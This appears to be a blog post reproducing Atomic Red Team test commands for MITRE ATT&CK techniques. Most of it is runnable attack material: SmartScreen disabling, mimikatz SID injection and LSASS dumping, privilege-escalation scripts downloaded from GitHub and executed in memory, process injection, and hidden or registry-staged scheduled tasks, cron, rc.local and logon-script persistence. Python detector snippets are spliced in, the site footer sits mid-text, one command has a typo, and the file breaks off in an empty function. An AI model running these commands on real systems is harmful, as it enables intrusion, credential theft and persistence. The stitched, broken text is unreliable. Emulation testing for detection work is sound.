reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /t REG_SZ /d Block /f

LOCKBIT BLACK - MODIFY GROUP POLICY SETTINGS -POWERSHELL

New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeDC -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffsetDC -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTime -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffset -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name ShellSmartScreenLevel -Force

--------------------------------------------------------------------------------

T1134.005 ACCESS TOKEN MANIPULATION: SID-HISTORY INJECTION

* Atomic Test #1 - Injection SID-History with mimikatz

INJECTION SID-HISTORY WITH MIMIKATZ

#{mimikatz_path} "privilege::debug" "sid::patch" "sid::add /sid:#{sid_to_inject} /sam:#{sam_account_name}" "exit"

--------------------------------------------------------------------------------

T1134.004 ACCESS TOKEN MANIPULATION: PARENT PID SPOOFING

* Atomic Test #1 - Parent PID Spoofing using PowerShell
* Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process
* Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process
* Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe
* Atomic Test #5 - Parent PID Spoofing - Spawn from New Process

PARENT PID SPOOFING USING POWERSHELL

. $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
$ppid=Get-Process #{parent_process_name} | select -expand id
PPID-Spoof -ppid $ppid -spawnto "#{spawnto_process_path}" -dllpath "#{dll_path}"

PARENT PID SPOOFING - SPAWN FROM CURRENT PROCESS

Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' -ParentId #{parent_pid}

PARENT PID SPOOFING - SPAWN FROM SPECIFIED PROCESS

Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}

PARENT PID SPOOFING - SPAWN FROM SVCHOST.EXE

Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = 'svchost.exe' AND CommandLine LIKE '%'" | Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'

PARENT PID SPOOFING - SPAWN FROM NEW PROCESS

Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'

--------------------------------------------------------------------------------

T1134.002 CREATE PROCESS WITH TOKEN

* Atomic Test #1 - Access Token Manipulation
* Atomic Test #2 - WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique

ACCESS TOKEN MANIPULATION

Set-ExecutionPolicy -Scope Process Bypass -Force
$owners = @{}
gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
Get-Process | Select ProcessName,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
$PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")

WINPWN - GET SYSTEM SHELL - POP SYSTEM SHELL USING TOKEN MANIPULATION TECHNIQUE

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem

--------------------------------------------------------------------------------

T1134.001 ACCESS TOKEN MANIPULATION: TOKEN IMPERSONATION/THEFT

* Atomic Test #1 - Named pipe client impersonation
* Atomic Test #2 - SeDebugPrivilege token duplication
* Atomic Test #3 - Launch NSudo Executable
* Atomic Test #4 - Bad Potato

NAMED PIPE CLIENT IMPERSONATION

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose

SEDEBUGPRIVILEGE TOKEN DUPLICATION

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose

LAUNCH NSUDO EXECUTABLE

Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
Start-Sleep -Second 5
Stop-Process -Name "cmd" -force -erroraction silentlycontinue

BAD POTATO

cd PathToAtomicsFolder\..\ExternalPayloads
Start-Process .\BadPotato.exe notepad.exe
Start-Sleep -Second 20
Stop-Process -Name "notepad" -force -erroraction silentlycontinue
Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue

--------------------------------------------------------------------------------

T1055 PROCESS INJECTION

* Atomic Test #1 - Shellcode execution via VBA
* Atomic Test #2 - Remote Process Injection in LSASS via mimikatz
* Atomic Test #3 - Section View Injection

SHELLCODE EXECUTION VIA VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"

REMOTE PROCESS INJECTION IN LSASS VIA MIMIKATZ

#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"

SECTION VIEW INJECTION

$notepad = Start-Process notepad -passthru
Start-Process $PathToAtomicsFolder\T1055\bin\x64\InjectView.exe

--------------------------------------------------------------------------------

T1055.012 PROCESS INJECTION: PROCESS HOLLOWING

* Atomic Test #1 - Process Hollowing using PowerShell
* Atomic Test #2 - RunPE via VBA

PROCESS HOLLOWING USING POWERSHELL

.
$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1 $ppid=Get-Process #{parent_process_name} | select -expand id Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose RUNPE VIA VBA [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit" -------------------------------------------------------------------------------- T1055.004 PROCESS INJECTION: ASYNCHRONOUS PROCEDURE CALL * Atomic Test #1 - Process Injection via C# PROCESS INJECTION VIA C# PathToAtomicsFolder\T1055.004\bin\T1055.exe| -------------------------------------------------------------------------------- T1055.003 THREAD EXECUTION HIJACKING * Atomic Test #1 - Thread Execution Hijacking THREAD EXECUTION HIJACKING $notepad = Start-Process notepad -passthru Start-Process $PathToAtomicsFolder\T1055.003\bin\InjectContext.exe Start-Sleep -Seconds 5 Stop-Process $notepad.id -------------------------------------------------------------------------------- T1055.001 PROCESS INJECTION: DYNAMIC-LINK LIBRARY INJECTION * Atomic Test #1 - Process Injection via mavinject.exe * Atomic Test #2 - WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique PROCESS INJECTION VIA MAVINJECT. 
EXE $mypid = #{process_id} mavinject $mypid /INJECTRUNNING #{dll_payload} Stop-Process -processname notepad WINPWN - GET SYSTEM SHELL - BIND SYSTEM SHELL USING USOCLIENT DLL LOAD TECHNIQUE iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1') -------------------------------------------------------------------------------- T1053.007 KUBERNETES CRONJOB * Atomic Test #1 - ListCronjobs * Atomic Test #2 - CreateCronjob LISTCRONJOBS kubectl get cronjobs -n #{namespace} CREATECRONJOB kubectl create -f src/cronjob.yaml -n #{namespace} -------------------------------------------------------------------------------- T1053.006 SCHEDULED TASK/JOB: SYSTEMD TIMERS * Atomic Test #1 - Create Systemd Service and Timer * Atomic Test #2 - Create a user level transient systemd service and timer * Atomic Test #3 - Create a system level transient systemd service and timer CREATE SYSTEMD SERVICE AND TIMER echo "[Unit]" > #{path_to_systemd_service} echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service} echo "[Service]" >> #{path_to_systemd_service} echo "Type=simple" >> #{path_to_systemd_service} echo "ExecStart=/bin/touch /tmp/art-systemd-timer-marker" >> #{path_to_systemd_service} echo "[Install]" >> #{path_to_systemd_service} echo "WantedBy=multi-user.target" >> #{path_to_systemd_service} echo "[Unit]" > #{path_to_systemd_timer} echo "Description=Executes Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_timer} echo "Requires=#{systemd_service_name}" >> #{path_to_systemd_timer} echo "[Timer]" >> #{path_to_systemd_timer} echo "Unit=#{systemd_service_name}" >> #{path_to_systemd_timer} echo "OnCalendar=*-*-* *:*:00" >> #{path_to_systemd_timer} echo "[Install]" >> #{path_to_systemd_timer} echo "WantedBy=timers.target" >> #{path_to_systemd_timer} systemctl start #{systemd_timer_name} systemctl enable #{systemd_timer_name} systemctl daemon-reload 
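An auditor for the unit files the test above writes, as an added example (not Atomic Red Team code): it parses a timer and the service it fires and flags an every-minute schedule and an ExecStart that touches /tmp or another untrusted directory. The unit texts and names (art-timer.timer, art-timer.service) are constructed to match the echo lines with the placeholders filled in; the logrotate pair is a constructed benign comparison.

```python
import configparser
from typing import Dict, List

# Constructed copies of the two unit files the test's echo lines produce,
# with the placeholders filled in (the names are assumptions, not the test's).
SERVICE_NAME = "art-timer.service"
TIMER_NAME = "art-timer.timer"

SERVICE_UNIT = """[Unit]
Description=Atomic Red Team Systemd Timer Service
[Service]
Type=simple
ExecStart=/bin/touch /tmp/art-systemd-timer-marker
[Install]
WantedBy=multi-user.target
"""

TIMER_UNIT = f"""[Unit]
Description=Executes Atomic Red Team Systemd Timer Service
Requires={SERVICE_NAME}
[Timer]
Unit={SERVICE_NAME}
OnCalendar=*-*-* *:*:00
[Install]
WantedBy=timers.target
"""

# Constructed benign pair, modelled on a distribution logrotate timer.
BENIGN_UNITS = {
    "logrotate.timer": "[Unit]\nDescription=Daily rotation of log files\n"
                       "[Timer]\nOnCalendar=daily\nPersistent=true\n"
                       "[Install]\nWantedBy=timers.target\n",
    "logrotate.service": "[Unit]\nDescription=Rotate log files\n"
                         "[Service]\nType=oneshot\nExecStart=/usr/sbin/logrotate /etc/logrotate.conf\n",
}

# Every-minute schedules as the test and systemd-run '*:0/1' write them.
EVERY_MINUTE = {"*-*-**:*:00", "*:0/1", "*:*:00", "minutely"}
# Directories a packaged service has no business executing from or writing to.
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def parse_unit(text: str) -> configparser.ConfigParser:
    """systemd units are INI-like. Keys are case-sensitive and '=' is the only
    delimiter (OnCalendar values contain ':'); strict=False tolerates repeated
    keys such as several ExecStart= lines."""
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None, strict=False)
    cp.optionxform = str  # keep key case
    cp.read_string(text)
    return cp


def audit_timer(timer_name: str, units: Dict[str, str]) -> List[str]:
    """Findings for one timer and the service it fires. `units` maps unit file
    name -> content (in a real audit, read from /etc/systemd/system,
    /run/systemd/system and ~/.config/systemd/user)."""
    findings: List[str] = []
    timer = parse_unit(units[timer_name])
    if not timer.has_section("Timer"):
        return [f"{timer_name}: no [Timer] section"]
    cal = timer.get("Timer", "OnCalendar", fallback="")
    if cal.replace(" ", "") in EVERY_MINUTE:
        findings.append(f"{timer_name}: fires every minute (OnCalendar={cal})")
    # Without Unit=, systemd activates the .service with the same stem.
    default_service = timer_name[: -len(".timer")] + ".service"
    service_name = timer.get("Timer", "Unit", fallback=default_service)
    if service_name not in units:
        findings.append(f"{timer_name}: target unit {service_name} not found")
        return findings
    service = parse_unit(units[service_name])
    exec_start = service.get("Service", "ExecStart", fallback="")
    # ExecStart may carry prefix characters (-, @, :, +, !) before the path.
    for arg in exec_start.lstrip("-@:+!").split():
        if arg.startswith(UNTRUSTED_DIRS):
            findings.append(f"{service_name}: ExecStart references {arg}")
    return findings


def audit_all(units: Dict[str, str]) -> Dict[str, List[str]]:
    """Audit every *.timer in `units`; timers without findings are omitted."""
    result: Dict[str, List[str]] = {}
    for name in sorted(units):
        if name.endswith(".timer"):
            findings = audit_timer(name, units)
            if findings:
                result[name] = findings
    return result


if __name__ == "__main__":
    everything = {TIMER_NAME: TIMER_UNIT, SERVICE_NAME: SERVICE_UNIT, **BENIGN_UNITS}
    for timer, findings in audit_all(everything).items():
        print(timer)
        for finding in findings:
            print("  -", finding)
```

On a live host, build the units dict from the contents of the directories named in audit_timer's docstring; transient timers created with systemd-run (tests #2 and #3) have no file on disk and only show up in systemctl list-timers.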
CREATE A USER LEVEL TRANSIENT SYSTEMD SERVICE AND TIMER

Transient units created by systemd-run exist only in memory (no unit file on disk) and show up in systemctl --user list-timers; '*:0/1' fires every minute.

systemd-run --user --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log'

CREATE A SYSTEM LEVEL TRANSIENT SYSTEMD SERVICE AND TIMER

systemd-run --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log'

--------------------------------------------------------------------------------

T1053.005 SCHEDULED TASK/JOB: SCHEDULED TASK

* Atomic Test #1 - Scheduled Task Startup Script
* Atomic Test #2 - Scheduled task Local
* Atomic Test #3 - Scheduled task Remote
* Atomic Test #4 - Powershell Cmdlet Scheduled Task
* Atomic Test #5 - Task Scheduler via VBA
* Atomic Test #6 - WMI Invoke-CimMethod Scheduled Task
* Atomic Test #7 - Scheduled Task Executing Base64 Encoded Commands From Registry
* Atomic Test #8 - Import XML Schedule Task with Hidden Attribute
* Atomic Test #9 - PowerShell Modify A Scheduled Task

SCHEDULED TASK STARTUP SCRIPT

schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"

SCHEDULED TASK LOCAL

SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}

SCHEDULED TASK REMOTE

SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}

POWERSHELL CMDLET SCHEDULED TASK

$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object

TASK SCHEDULER VIA VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"

WMI INVOKE-CIMMETHOD SCHEDULED TASK

Registers a task from an XML definition through the PS_ScheduledTask WMI class, so neither schtasks.exe nor Register-ScheduledTask appears in process or PowerShell logging.

$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -Namespace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml = $xml }

SCHEDULED TASK EXECUTING BASE64 ENCODED COMMANDS FROM REGISTRY

The task's command line carries no payload: at run time it reads cGluZyAxMjcuMC4wLjE= (base64 for "ping 127.0.0.1") from HKCU\SOFTWARE\ATOMIC-T1053.005 and passes the decoded string to IEX.

reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}

IMPORT XML SCHEDULE TASK WITH HIDDEN ATTRIBUTE

The same RegisterByXml call as test #6; the difference is in the XML, whose <Settings> block contains <Hidden>true</Hidden> so the task is not listed in the Task Scheduler UI.

$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -Namespace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml = $xml }

POWERSHELL MODIFY A SCHEDULED TASK

Registers a benign task, then swaps its action, which is the pattern of hijacking an existing legitimate task rather than creating a new one.

$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction

--------------------------------------------------------------------------------

T1053.003 SCHEDULED TASK/JOB: CRON

* Atomic Test #1 - Cron - Replace crontab with referenced file
* Atomic Test #2 - Cron - Add script to all cron subfolders
* Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder

CRON - REPLACE CRONTAB WITH REFERENCED FILE

Backs up the current user's crontab to /tmp/notevil, then replaces (not appends to) the crontab with a single every-minute entry.

crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}

CRON - ADD SCRIPT TO ALL CRON SUBFOLDERS

Scripts in /etc/cron.* run as root via run-parts, but only if they are executable, and on Debian-derived systems only if the file name contains no dot.

echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}

CRON - ADD SCRIPT TO /VAR/SPOOL/CRON/CRONTABS/ FOLDER

On Debian-based systems /var/spool/cron/crontabs holds one crontab per user, named after the user, so cron_script_name must be an existing user name and command must be a full crontab line; cron picks up the change when the file's mtime changes.

echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}

--------------------------------------------------------------------------------

T1053.002 SCHEDULED TASK/JOB: AT

* Atomic Test #1 - At.exe Scheduled task
* Atomic Test #2 - At - Schedule a job

AT.EXE SCHEDULED TASK

at.exe has been deprecated since Windows 8; on current Windows it only prints a notice pointing to schtasks.exe.

at 13:20 /interactive cmd

AT - SCHEDULE A JOB

Linux/Unix at; requires the atd daemon to be running.

echo "#{at_command}" | at #{time_spec}

--------------------------------------------------------------------------------

T1037.005 BOOT OR LOGON INITIALIZATION SCRIPTS: STARTUP ITEMS

* Atomic Test #1 - Add file to Local Library StartupItems

ADD FILE TO LOCAL LIBRARY STARTUPITEMS

/Library/StartupItems is the legacy, pre-launchd startup mechanism and the directory does not exist by default on current macOS, so create it first for the touch to succeed; the test only creates the file and proves nothing about execution.

sudo touch /Library/StartupItems/EvilStartup.plist

--------------------------------------------------------------------------------

T1037.004 BOOT OR LOGON INITIALIZATION SCRIPTS: RC.COMMON

* Atomic Test #1 - rc.common
* Atomic Test #2 - rc.common
* Atomic Test #3 - rc.local

RC.COMMON 1

As originally written (sudo echo ... >> /etc/rc.common) the redirection runs as the unprivileged user, so the append to the root-owned file fails; piping through sudo tee -a fixes that. macOS has not executed rc.common at boot since 10.10, so on a modern Mac this only tests the file write.

printf '%s\n' "osascript -e 'tell app \"Finder\" to display dialog \"Hello World\"'" | sudo tee -a /etc/rc.common

RC.COMMON 2

Backs up any existing rc.common, then overwrites it. The base64 blob is the python3 program: import os; os.popen('echo atomic test for modifying rc.common > /tmp/T1037.004.rc.common').

filename='/etc/rc.common'; if [ ! -f "$filename" ]; then sudo touch "$filename"; else sudo cp "$filename" /etc/rc.common.original; fi
printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
sudo chmod +x /etc/rc.common

RC.LOCAL

Same structure as test #2 for /etc/rc.local; the blob writes /tmp/T1037.004.rc.local. On systemd distributions rc.local only runs if rc-local.service is enabled and the file is executable.

filename='/etc/rc.local'; if [ ! -f "$filename" ]; then sudo touch "$filename"; else sudo cp "$filename" /etc/rc.local.original; fi
print '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
sudo chmod +x /etc/rc.local

--------------------------------------------------------------------------------

T1037.002 BOOT OR LOGON INITIALIZATION SCRIPTS: LOGON SCRIPT (MAC)

* Atomic Test #1 - Logon Scripts - Mac

LOGON SCRIPTS - MAC

A LoginHook runs the named script as root at every login. Steps 1 and 2 set it in root's loginwindow preferences (system-wide); steps 3 and 4 do the same in the current user's preferences without sudo.

1. Create the required plist file
sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist
2. Populate the plist with the location of your shell script
sudo defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh
3. Create the required plist file in the target user's Preferences directory
touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
4. Populate the plist with the location of your shell script
defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh

--------------------------------------------------------------------------------

T1037.001 BOOT OR LOGON INITIALIZATION SCRIPTS: LOGON SCRIPT (WINDOWS)

* Atomic Test #1 - Logon Scripts

LOGON SCRIPTS

userinit.exe reads UserInitMprLogonScript from HKCU\Environment at logon and runs the named script in the user's context, so no administrative rights are needed to plant it.

echo "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f

Categories: 安全 (Security). Tags: Att&ck, 安全 (Security).
Posted 2023-06-28 13:53 by 皇帽讲绿帽带法技巧. Views: 41. Comments: 0.
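A detector for the T1484.001 state at the top of this list, as an added example (not Atomic Red Team code): it parses the text that `reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\System"` prints and reports the four zeroed refresh timers, the disabled SmartScreen policy and, when both are present, the full LockBit Black pattern. Both reg query outputs below are constructed samples: one as the test leaves the host, one with a normal SmartScreen policy.

```python
import re
from typing import Dict, List, Optional, Tuple

POLICY_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System"
REFRESH_VALUES = (
    "GroupPolicyRefreshTimeDC", "GroupPolicyRefreshTimeOffsetDC",
    "GroupPolicyRefreshTime", "GroupPolicyRefreshTimeOffset",
)

# Constructed `reg query` output for a host after the LockBit Black test ran ...
SAMPLE_TAMPERED = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System
    GroupPolicyRefreshTimeDC    REG_DWORD    0x0
    GroupPolicyRefreshTimeOffsetDC    REG_DWORD    0x0
    GroupPolicyRefreshTime    REG_DWORD    0x0
    GroupPolicyRefreshTimeOffset    REG_DWORD    0x0
    EnableSmartScreen    REG_DWORD    0x0
    ShellSmartScreenLevel    REG_SZ    Block

"""

# ... and (constructed) for a host with SmartScreen enforced and default refresh timers.
SAMPLE_CLEAN = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System
    EnableSmartScreen    REG_DWORD    0x1
    ShellSmartScreenLevel    REG_SZ    Warn

"""

VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s*(.*)$")
RegValues = Dict[str, Tuple[str, str]]  # value name -> (type, data as printed)


def parse_reg_query(text: str) -> Dict[str, RegValues]:
    """Parse `reg query` text into {key path: {value name: (type, data)}}.
    Key paths are flush-left and start with HKEY_; value lines are indented."""
    keys: Dict[str, RegValues] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace() and line.startswith("HKEY_"):
            current = line.strip()
            keys[current] = {}
        elif current is not None:
            m = VALUE_LINE.match(line)
            if m:
                name, typ, data = m.groups()
                keys[current][name] = (typ, data.strip())
    return keys


def as_dword(value: Optional[Tuple[str, str]]) -> Optional[int]:
    """reg query prints REG_DWORD data in hex (0x0); return it as an int, else None."""
    if value is None or value[0] != "REG_DWORD":
        return None
    return int(value[1], 16)


def evaluate(keys: Dict[str, RegValues]) -> List[str]:
    """Findings for the policy key. The full LockBit Black pattern is all four
    refresh timers at 0 together with SmartScreen disabled by policy."""
    vals = keys.get(POLICY_KEY, {})
    findings: List[str] = []
    zeroed = [n for n in REFRESH_VALUES if as_dword(vals.get(n)) == 0]
    if zeroed:
        # 0 minutes means "refresh about every 7 seconds", not "never".
        findings.append("Group Policy refresh interval forced to 0: " + ", ".join(zeroed))
    smartscreen_off = as_dword(vals.get("EnableSmartScreen")) == 0
    if smartscreen_off:
        findings.append("SmartScreen disabled by policy (EnableSmartScreen=0)")
    if len(zeroed) == len(REFRESH_VALUES) and smartscreen_off:
        findings.append("matches LockBit Black Group Policy tampering (T1484.001)")
    return findings


if __name__ == "__main__":
    for label, sample in (("tampered", SAMPLE_TAMPERED), ("clean", SAMPLE_CLEAN)):
        print(label, evaluate(parse_reg_query(sample)) or ["no findings"])
```

Collect the input with `reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" > policy.txt` on the host (or over a remote session) and feed the file to parse_reg_query; keys that are absent simply produce no findings, so a clean host with no policy key at all evaluates to an empty list.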
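An auditor for Task Scheduler XML, as an added example (not Atomic Red Team code) tying together T1053.005 tests #6, #7 and #8 above: it reads a task definition in the format RegisterByXml consumes and flags a hidden task, a LocalSystem or highest-privilege principal, logon/boot triggers, an -EncodedCommand payload (decoded from UTF-16LE base64) and an action that decodes a payload staged in the registry. The task XML is constructed by make_task_xml; the registry-staged action is the command line from test #7, the -EncodedCommand variant is an assumption added for the decoding path.

```python
import base64
import re
import xml.etree.ElementTree as ET
from typing import List, Optional
from xml.sax.saxutils import escape

TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"
NS = {"t": TASK_NS}

# powershell.exe accepts -e, -ec, -enc and -encodedcommand for the UTF-16LE base64 payload.
ENCODED_CMD = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)
# Payload decoded in-line or fetched from the registry rather than stored in the task.
STAGED_PAYLOAD = re.compile(r"FromBase64String|Get-ItemProperty\s+-Path\s+HK|reg(?:\.exe)?\s+query", re.I)


def make_task_xml(arguments: str, hidden: bool = True, user_id: str = "S-1-5-18") -> str:
    """Constructed task definition in the shape `schtasks /Query /XML` exports.
    (A real export begins with an encoding="UTF-16" declaration; parse files as bytes.)"""
    return f"""<Task version="1.2" xmlns="{TASK_NS}">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>{user_id}</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>{str(hidden).lower()}</Hidden><Enabled>true</Enabled></Settings>
  <Actions Context="Author"><Exec><Command>cmd</Command><Arguments>{escape(arguments)}</Arguments></Exec></Actions>
</Task>"""


# Action from test #7: the payload lives in HKCU\SOFTWARE\ATOMIC-T1053.005, not in the task.
REGISTRY_STAGED_ARGS = ('/c start /min "" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString('
                        '[System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))')
# Constructed -EncodedCommand variant carrying the same "ping 127.0.0.1".
ENCODED_ARGS = "/c powershell.exe -EncodedCommand " + base64.b64encode("ping 127.0.0.1".encode("utf-16-le")).decode()


def _text(node: ET.Element, path: str) -> Optional[str]:
    child = node.find(path, NS)
    return child.text.strip() if child is not None and child.text else None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand payloads are base64 over UTF-16LE text."""
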